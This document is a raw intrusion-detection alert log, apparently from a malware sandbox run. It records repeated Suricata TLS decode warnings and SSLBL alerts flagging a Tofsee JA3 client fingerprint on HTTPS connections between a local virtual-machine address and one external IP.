TCP 34.192.83.212:443 -> 192.168.56.101:49212 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49398 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49268 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49202 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49202 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49226 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49226 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49335 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49335 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49226 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49335 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49203 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49203 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49203 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49335 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49335 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49226 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49226 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49398 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49203 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49272 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49398 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49203 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49272 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49272 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49338 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49338 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49338 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49227 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49227 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49227 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49275 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49275 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49209 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49275 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49209 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49402 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49402 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49402 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49338 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49338 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49278 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49402 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49227 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49402 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49227 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49351 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49351 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49221 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49351 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49221 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49278 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49278 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49272 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49351 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49272 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49403 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49403 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49228 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49403 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49295 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49295 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49228 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49351 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49228 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49230 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49276 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49230 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49276 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49230 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49276 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49229 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49229 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49229 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49412 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49412 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49412 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49231 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49229 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49276 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49295 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49229 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49276 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49412 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49412 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49295 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49295 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49236 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49416 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49236 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49416 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49236 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49356 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49416 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49300 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49356 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49300 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49279 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49300 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49356 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49279 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49279 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49239 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49239 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49239 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49356 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49356 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49438 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49239 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49239 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49438 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49438 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49231 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49231 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49279 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49279 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49441 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49246 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49441 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49441 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49233 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49246 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49246 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49363 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49233 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49233 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49441 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49441 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49363 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49363 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49248 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49234 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49234 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49248 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49248 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49302 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49367 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49446 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49367 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49367 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49258 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49258 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49367 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49258 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49367 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49234 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49234 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49258 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49448 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49258 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49448 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49370 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49448 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49261 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49261 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49261 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49449 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49261 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49302 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49261 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49449 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49302 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49375 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49449 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49375 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49375 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49265 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49449 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49265 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49306 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49449 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49375 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49265 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49306 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49375 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49306 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49265 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49265 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49306 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49306 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49378 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49451 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49378 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49378 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49271 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49451 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49378 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49451 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49378 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49271 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49328 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49271 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49328 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49328 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49456 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49328 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49456 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49271 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49328 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49387 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49271 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49456 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
